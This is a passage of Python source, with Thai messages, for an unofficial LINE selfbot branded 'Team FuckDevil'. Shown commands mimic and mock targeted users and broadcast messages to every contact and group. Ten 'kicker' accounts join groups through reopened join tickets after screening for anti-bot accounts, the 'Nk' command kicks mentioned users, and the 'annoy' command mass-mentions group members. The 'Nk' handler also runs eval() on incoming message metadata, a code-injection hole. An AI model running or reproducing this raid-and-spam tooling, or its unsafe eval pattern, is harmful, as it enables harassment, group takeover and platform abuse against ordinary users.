if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
return line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
return line.sendMessage(to, 'ไม่สามารถดึงรูปได้, บุคคนนี้ `%s` doesn\'ไม่ได้ใส่รูปภาพโปรไฟล์' % profile.displayName)
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
res += '\n│ %i. %s' % (no, path)
else:
res += '\n│ %i. Not Found' % no
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงรูปได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('cover '):
res = '╭───「 Cover Picture 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
res += '\n│ %i. %s' % (no, cover)
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงปกได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('mimic'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
targets = ''
if settings['mimic']['target']:
no = 0
for target, status in settings['mimic']['target'].items():
no += 1
try:
name = line.getContact(target).displayName
except TalkException:
name = 'Unknown'
targets += '\n│ %i. %s//%s' % (no, name, bool_dict[status][1])
else:
targets += '\n│ Nothing'
res = '╭───「 Mimic 」'
res += '\n├🌷 Status : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├🌷 List :'
res += targets
res += '\n├👊 Usage : '
res += '\n│🌷 {key}Mimic'
res += '\n│🌷 {key}Mimic <on/off>'
res += '\n│🌷 {key}Mimic Reset'
res += '\n│🌷 {key}Mimic Add <mention>'
res += '\n│🌷 {key}Mimic Del <mention>'
res += '\n╰───【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
if cmd == 'mimic':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['mimic']['status']:
line.sendMessage(to, 'เริ่มการล้อเลียน')
else:
settings['mimic']['status'] = True
line.sendMessage(to, 'เริ่มการล้อเลียน')
elif texttl == 'off':
if not settings['mimic']['status']:
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
else:
settings['mimic']['status'] = False
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
elif texttl == 'reset':
settings['mimic']['target'] = {}
line.sendMessage(to, 'รีเช็ตรายชื่อที่จะล้อเลี่ยนเรียบร้อย')
elif texttl.startswith('add '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Add Target'
res += '\n├ Added :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
settings['mimic']['target'][mid] = True
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถเพื่มรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Del Target'
res += '\n├ Deleted :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in settings['mimic']['target']:
settings['mimic']['target'][mid] = False
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถลบรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('ประกาศ'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 ประกาศ 」'
res += '\n├🌷 ประกาศ ข้อความ : '
res += '\n│🌷 1 : เพื่อน'
res += '\n│🌷 2 : กลุ่ม'
res += '\n│🌷 0 : All'
res += '\n├👊 Usage : '
res += '\n│👊 {key}ประกาศ'
res += '\n│👊 {key}ประกาศ ⁐【พิมพ์】'
res += '\n╰───【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
if cmd == 'ประกาศ':
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cond[0] == '1':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 ประกาศ 」\n'
res += textt[2:]
res += '\n\n👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊 '
targets = line.getAllContactIds()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i คน' % len(targets))
elif cond[0] == '2':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 ประกาศ 」\n'
res += textt[2:]
res += '\n\n【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
targets = line.getGroupIdsJoined()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i กลุ่ม' % len(targets))
elif cond[0] == '0':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 ประกาศ 」\n'
res += textt[2:]
res += '\n\n👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
targets = line.getGroupIdsJoined() + line.getAllContactIds()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i ' % len(targets))
else:
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cmd.startswith('เพื่อน'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getAllContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 ข้อมูลเพื่อน」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}FriendList'
res += '\n│ • {key}FriendList Info <num/name>'
res += '\n│ • {key}FriendList Add <mention>'
res += '\n│ • {key}FriendList Del <mention/num/name/all>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊 '
ress.append(res)
if cmd == 'เพื่อน':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลเพื่อนล้มเหลว, ไม่พบเพื่อน')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Friend List 」'
res += '\n├ Status : Add Friend'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.findAndAddContactsByMid(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถแอดเพื่อนได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
return line.sendMessage(to, 'เปิดข้อผิดพลาดที่ไม่แน่ชัด')
res = '╭───「 Friend List 」'
res += '\n├ Status : Del Friend'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.deleteContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
line.sendMessage(to, 'Failed del friend with name `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
        # Block-list manager. Sub-commands (parsed from the text after the
        # command keyword): plain "blocklist" lists blocked contacts,
        # "info <num/name>", "add <mention>", "del <mention/num/name/all>".
        # Listing is paged in chunks of 200 contacts to stay under message limits.
        elif cmd.startswith('blocklist'):
            textt = removeCmd(text, setKey)          # argument string after the command keyword
            texttl = textt.lower()
            cids = line.getBlockedContactIds()       # mids of currently blocked contacts
            cids.sort()
            cnames = []                              # display names, index-aligned with `contacts`
            ress = []                                # list of message pages to send
            res = '╭───「 Block List 」'
            res += '\n├ List:'
            if cids:
                contacts = []
                no = 0
                if len(cids) > 200:
                    # Paged fetch: resolve contacts 200 at a time, flushing a page per chunk.
                    parsed_len = len(cids)//200+1
                    for point in range(parsed_len):
                        for cid in cids[point*200:(point+1)*200]:
                            try:
                                contact = line.getContact(cid)
                                contacts.append(contact)
                            except TalkException:
                                # Contact no longer resolvable; drop it from the id list.
                                # NOTE(review): removing from `cids` while slicing it by
                                # fixed offsets may skip entries — confirm intended.
                                cids.remove(cid)
                                continue
                            no += 1
                            res += '\n│ %i. %s' % (no, contact.displayName)
                            cnames.append(contact.displayName)
                        if res:
                            if res.startswith('\n'): res = res[1:]
                            if point != parsed_len - 1:
                                ress.append(res)
                            if point != parsed_len - 1:
                                res = ''
                else:
                    for cid in cids:
                        try:
                            contact = line.getContact(cid)
                            contacts.append(contact)
                        except TalkException:
                            cids.remove(cid)
                            continue
                        no += 1
                        res += '\n│ %i. %s' % (no, contact.displayName)
                        cnames.append(contact.displayName)
            else:
                res += '\n│ Nothing'
            res += '\n├ Usage : '
            res += '\n│ • {key}BlockList'
            res += '\n│ • {key}BlockList Info <num/name>'
            res += '\n│ • {key}BlockList Add <mention>'
            res += '\n│ • {key}BlockList Del <mention/num/name/all>'
            res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
            ress.append(res)
            if cmd == 'blocklist':
                # Bare command: just print the (paged) listing.
                for res in ress:
                    line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
            elif texttl.startswith('info '):
                # Show profile picture, cover and contact card for each argument
                # (comma-separated list of 1-based indexes or display names).
                texts = textt[5:].split(', ')
                if not cids:
                    return line.sendMessage(to, 'แสดงข้อมูลผู้ใช้ที่ถูกบล็อกล้มเหลว, ไม่มีผู้ใช้ในรายการ')
                for texxt in texts:
                    num = None
                    name = None
                    try:
                        num = int(texxt)
                    except ValueError:
                        name = texxt
                    if num != None:
                        contact = contacts[num - 1]
                        if contact.pictureStatus:
                            line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
                        cover = line.getProfileCoverURL(contact.mid)
                        line.sendImageWithURL(to, str(cover))
                        res = '╭───「 Contact Info 」'
                        res += '\n├ MID : ' + contact.mid
                        res += '\n├ Display Name : ' + str(contact.displayName)
                        if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
                        res += '\n├ Status Message : ' + str(contact.statusMessage)
                        res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                        line.sendMessage(to, parsingRes(res))
                    elif name != None:
                        if name in cnames:
                            contact = contacts[cnames.index(name)]
                            if contact.pictureStatus:
                                line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
                            cover = line.getProfileCoverURL(contact.mid)
                            line.sendImageWithURL(to, str(cover))
                            res = '╭───「 Contact Info 」'
                            res += '\n├ MID : ' + contact.mid
                            res += '\n├ Display Name : ' + str(contact.displayName)
                            if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
                            res += '\n├ Status Message : ' + str(contact.statusMessage)
                            res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                            line.sendMessage(to, parsingRes(res))
            elif texttl.startswith('add '):
                # Block every mentioned user that is not already blocked.
                res = '╭───「 Block List 」'
                res += '\n├ Status : Add Block'
                res += '\n├ Added :'
                no = 0
                added = []
                if 'MENTION' in msg.contentMetadata.keys():
                    mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
                    for mention in mentions['MENTIONEES']:
                        mid = mention['M']
                        if mid in cids or mid in added:
                            continue
                        no += 1
                        try:
                            line.blockContact(mid)
                            name = line.getContact(mid).displayName
                        except TalkException:
                            name = 'Unknown'
                        res += '\n│ %i. %s' % (no, name)
                        added.append(mid)
                    if no == 0: res += '\n│ Nothing'
                    res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                    line.sendMessage(to, res)
                else:
                    line.sendMessage(to, 'Failed block contact, กรุณาแทคผู้ใช้ด้วย')
            elif texttl.startswith('del '):
                # Unblock by mention, index, name, or 'all'.
                texts = textt[4:].split(', ')
                if not cids:
                    return line.sendMessage(to, 'ไม่สามาถปลกบล็อคได้, ไม่มีผู้ใช้ในรายการ')
                res = '╭───「 Block List 」'
                res += '\n├ Status : Del Block'
                res += '\n├ Deleted :'
                no = 0
                deleted = []
                if 'MENTION' in msg.contentMetadata.keys():
                    mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
                    for mention in mentions['MENTIONEES']:
                        mid = mention['M']
                        if mid not in cids or mid in deleted:
                            continue
                        no += 1
                        try:
                            line.unblockContact(mid)
                            name = line.getContact(mid).displayName
                        except TalkException:
                            name = 'Unknown'
                        res += '\n│ %i. %s' % (no, name)
                        deleted.append(mid)
                for texxt in texts:
                    num = None
                    name = None
                    try:
                        num = int(texxt)
                    except ValueError:
                        name = texxt
                    if num != None:
                        contact = contacts[num - 1]
                        # NOTE(review): `not in cids and in deleted` looks like it was
                        # meant to be `or` (skip already-deleted OR unknown) — confirm.
                        if contact.mid not in cids and contact.mid in deleted:
                            continue
                        no += 1
                        try:
                            line.unblockContact(contact.mid)
                            name = contact.displayName
                        except TalkException:
                            name = 'Unknown'
                        res += '\n│ %i. %s' % (no, name)
                        deleted.append(contact.mid)
                    elif name != None:
                        if name in cnames:
                            contact = contacts[cnames.index(name)]
                            if contact.mid not in cids and contact.mid in deleted:
                                continue
                            no += 1
                            try:
                                line.unblockContact(contact.mid)
                                name = contact.displayName
                            except TalkException:
                                name = 'Unknown'
                            res += '\n│ %i. %s' % (no, name)
                            deleted.append(contact.mid)
                        elif name.lower() == 'all':
                            for contact in contacts:
                                if contact.mid not in cids and contact.mid in deleted:
                                    continue
                                no += 1
                                try:
                                    line.unblockContact(contact.mid)
                                    name = contact.displayName
                                except TalkException:
                                    name = 'Unknown'
                                res += '\n│ %i. %s' % (no, name)
                                deleted.append(contact.mid)
                                time.sleep(0.8)  # throttle to avoid server-side rate limiting
                        else:
                            line.sendMessage(to, 'ไม่สามารถปลดบล็อกรายชื่อนี้ได้ `%s`, ชื่อไม่อยู่ในรายการ ♪' % name)
                if no == 0: res += '\n│ Nothing'
                res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                line.sendMessage(to, res)
            else:
                # Unknown sub-command: fall back to printing the listing + usage.
                for res in ress:
                    line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
        # ".getjoined": list every joined group as "name\nid", flushing a
        # message every 10 groups to keep messages short.
        elif msg.text.lower() == ".getjoined":
            line.sendMessage(to,"กรุณารอสักครู่ ใจเย็นๆ")
            all = line.getGroupIdsJoined()   # NOTE: shadows the builtin all()
            text = ""
            cnt = 0
            for i in all:
                text += line.getGroup(i).name + "\n" + i + "\n\n"
                cnt += 1
                if cnt == 10:
                    line.sendMessage(to,text[:-2])   # drop trailing blank line
                    text = ""
                    cnt = 0
            # Flush the remainder. NOTE(review): if the count was an exact
            # multiple of 10 (or zero groups) this sends an empty message — confirm OK.
            line.sendMessage(to,text[:-2])
            cnt = 0
        # "kickejoinid <gid>": make all ten kicker accounts join the given group
        # via its QR ticket, temporarily opening the ticket if it is closed and
        # the group looks safe (no known anti-bot "siri" accounts present).
        elif "kickejoinid " in msg.text.lower():
            spl = re.split("kickejoinid ",msg.text,flags=re.IGNORECASE)
            if spl[0] == "":
                gid = spl[1]
                x = line.getGroup(gid)
                if Amid not in [i.mid for i in x.members]:
                    if x.preventedJoinByTicket == False:
                        # Ticket already open: all kickers join directly.
                        ticket = line.reissueGroupTicket(gid)
                        kicker.acceptGroupInvitationByTicket(gid,ticket)
                        kicker2.acceptGroupInvitationByTicket(gid,ticket)
                        kicker3.acceptGroupInvitationByTicket(gid,ticket)
                        kicker4.acceptGroupInvitationByTicket(gid,ticket)
                        kicker5.acceptGroupInvitationByTicket(gid,ticket)
                        kicker6.acceptGroupInvitationByTicket(gid,ticket)
                        kicker7.acceptGroupInvitationByTicket(gid,ticket)
                        kicker8.acceptGroupInvitationByTicket(gid,ticket)
                        kicker9.acceptGroupInvitationByTicket(gid,ticket)
                        kicker10.acceptGroupInvitationByTicket(gid,ticket)
                    else:
                        # Ticket closed: detect members that look like anti-bot
                        # ("siri") accounts by display name or an all-digit name.
                        sirilist = [i.mid for i in x.members if any(word in i.displayName for word in ["Doctor.A","Eliza","Parry","Rakko","しりちゃん"]) or i.displayName.isdigit()]
                        if sirilist == []:
                            # No anti-bot members: open the ticket, join, leave it open.
                            x.preventedJoinByTicket = False
                            line.updateGroup(x)
                            ticket = line.reissueGroupTicket(gid)
                            kicker.acceptGroupInvitationByTicket(gid,ticket)
                            kicker2.acceptGroupInvitationByTicket(gid,ticket)
                            kicker3.acceptGroupInvitationByTicket(gid,ticket)
                            kicker4.acceptGroupInvitationByTicket(gid,ticket)
                            kicker5.acceptGroupInvitationByTicket(gid,ticket)
                            kicker6.acceptGroupInvitationByTicket(gid,ticket)
                            kicker7.acceptGroupInvitationByTicket(gid,ticket)
                            kicker8.acceptGroupInvitationByTicket(gid,ticket)
                            kicker9.acceptGroupInvitationByTicket(gid,ticket)
                            kicker10.acceptGroupInvitationByTicket(gid,ticket)
                            kicker.sendMessage(gid,"🤒โหมดคุ้มกันแอดมินทำงานแล้วลูกพี่🤒")
                        else:
                            # Anti-bot members present: invite the admin instead and
                            # re-close the ticket.
                            line.inviteIntoGroup(gid,[Amid])
                            x.preventedJoinByTicket = True
                            line.updateGroup(x)
                            kicker.sendMessage(gid,"🤒โหมดคุ้มกันคนเตะแอดมินทำงานแล้วลูกพี่🤒")
                else:
                    line.sendMessage(to,"kicker อยู่ในกลุ่มอยู่แล้ว")
        # "มา" ("come"): admin-only. Opens the current group's QR ticket, has all
        # ten kicker accounts join, then re-closes the ticket and announces.
        elif cmd == "มา":
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.toType == 2:
                        x = line.getGroup(msg.to)
                        if x.preventedJoinByTicket:
                            x.preventedJoinByTicket = False
                            line.updateGroup(x)
                        Ticket = line.reissueGroupTicket(msg.to)
                        kicker.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker2.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker3.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker4.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker5.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker6.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker7.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker8.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker9.acceptGroupInvitationByTicket(msg.to,Ticket)
                        kicker10.acceptGroupInvitationByTicket(msg.to,Ticket)
                        # NOTE(review): only the last fetched G (kicker10's view) is
                        # actually used below; the nine earlier fetches are discarded.
                        G = kicker.getGroup(msg.to)
                        G = kicker2.getGroup(msg.to)
                        G = kicker3.getGroup(msg.to)
                        G = kicker4.getGroup(msg.to)
                        G = kicker5.getGroup(msg.to)
                        G = kicker6.getGroup(msg.to)
                        G = kicker7.getGroup(msg.to)
                        G = kicker8.getGroup(msg.to)
                        G = kicker9.getGroup(msg.to)
                        G = kicker10.getGroup(msg.to)
                        G.preventedJoinByTicket = True
                        # A random kicker account closes the ticket again.
                        random.choice(ABC).updateGroup(G)
                        kicker.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker2.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker3.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker4.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker5.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker6.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker7.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker8.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker9.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                        kicker10.sendMessage(msg.to,"【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】")
                    else:
                        kicker.sendMessage(to,"🤨ทีมกากๆแบบกือมาแล้วครับ🤫")
        # "kickerleave <gid>": make all ten kicker accounts leave the given group;
        # any failure is reported back as the exception text.
        elif "kickerleave " in msg.text.lower():
            spl = re.split("kickerleave ",msg.text,flags=re.IGNORECASE)
            if spl[0] == "":
                try:
                    kicker.leaveGroup(spl[1])
                    kicker2.leaveGroup(spl[1])
                    kicker3.leaveGroup(spl[1])
                    kicker4.leaveGroup(spl[1])
                    kicker5.leaveGroup(spl[1])
                    kicker6.leaveGroup(spl[1])
                    kicker7.leaveGroup(spl[1])
                    kicker8.leaveGroup(spl[1])
                    kicker9.leaveGroup(spl[1])
                    kicker10.leaveGroup(spl[1])
                except Exception as e:
                    line.sendMessage(to,str(e))
        #===========KICKOUT============#
        # "Nk @user": admin-only kick. Opens the group ticket, has g1 join and
        # kick each mentioned non-bot target, then re-closes the ticket.
        elif ("Nk " in msg.text):
            if wait["selfbot"] == True:
                if msg._from in admin:
                    # HACK: eval() on message metadata — contentMetadata['MENTION']
                    # is attacker-influenced text; ast.literal_eval would be safer.
                    key = eval(msg.contentMetadata["MENTION"])
                    key["MENTIONEES"][0]["M"]
                    targets = []
                    for x in key["MENTIONEES"]:
                        targets.append(x["M"])
                    for target in targets:
                        if target not in Bots:
                            try:
                                G = client.getCompactGroup(msg.to)
                                G.preventedJoinByTicket = False
                                client.updateGroup(G)
                                invsend = 0
                                Ticket = client.reissueGroupTicket(msg.to)
                                g1.acceptGroupInvitationByTicket(msg.to,Ticket)
                                g1.kickoutFromGroup(msg.to, [target])
                                X = client.getCompactGroup(msg.to)
                                X.preventedJoinByTicket = True
                                client.updateGroup(X)
                            except:
                                pass
        #===========BOT UPDATE============#
        # "กวน" ("annoy"): admin-only mass mention of group members.
        # Variants: bare = mention everyone; "<N" = first N; ">N" = from N on;
        # "=N" = only member N. Mentions are emitted in batches of 20; `strt`/`akh`
        # track the character start/end offsets of each "@name" token inside the
        # message text for the MENTION metadata, so their bookkeeping is exact.
        elif msg.text.lower().startswith("กวน"):
            if msg._from in admin:
                data = msg.text[len("กวน"):].strip()
                if data == "":
                    group = line.getGroup(msg.to)
                    nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
                    cb = ""        # accumulated MENTIONEES JSON fragments
                    cb2 = ""       # accumulated visible message text
                    count = 1      # running member number shown in the text
                    strt = len(str(count)) + 2   # offset of the next "@name" token
                    akh = int(0)                 # offset of the token's end
                    cnt = 0        # members in the current 20-member batch
                    for md in nama:
                        akh = akh + len(str(count)) + 2 + 5
                        cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
                        strt = strt + len(str(count+1)) + 2 + 6
                        akh = akh + 1
                        cb2 += str(count)+". @name\n"
                        cnt = cnt + 1
                        if cnt == 20:
                            # Flush a batch of 20 mentions.
                            cb = (cb[:int(len(cb)-1)])   # strip trailing comma
                            cb2 = cb2[:-1]               # strip trailing newline
                            msg.contentType = 0
                            msg.text = cb2
                            msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                            try:
                                line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                            except:
                                line.sendMessage(msg.to,"[[NO MENTION]]")
                            cb = ""
                            cb2 = ""
                            strt = len(str(count)) + 2
                            akh = int(0)
                            cnt = 0
                        count += 1
                    # Flush the final partial batch.
                    cb = (cb[:int(len(cb)-1)])
                    cb2 = cb2[:-1]
                    msg.contentType = 0
                    msg.text = cb2
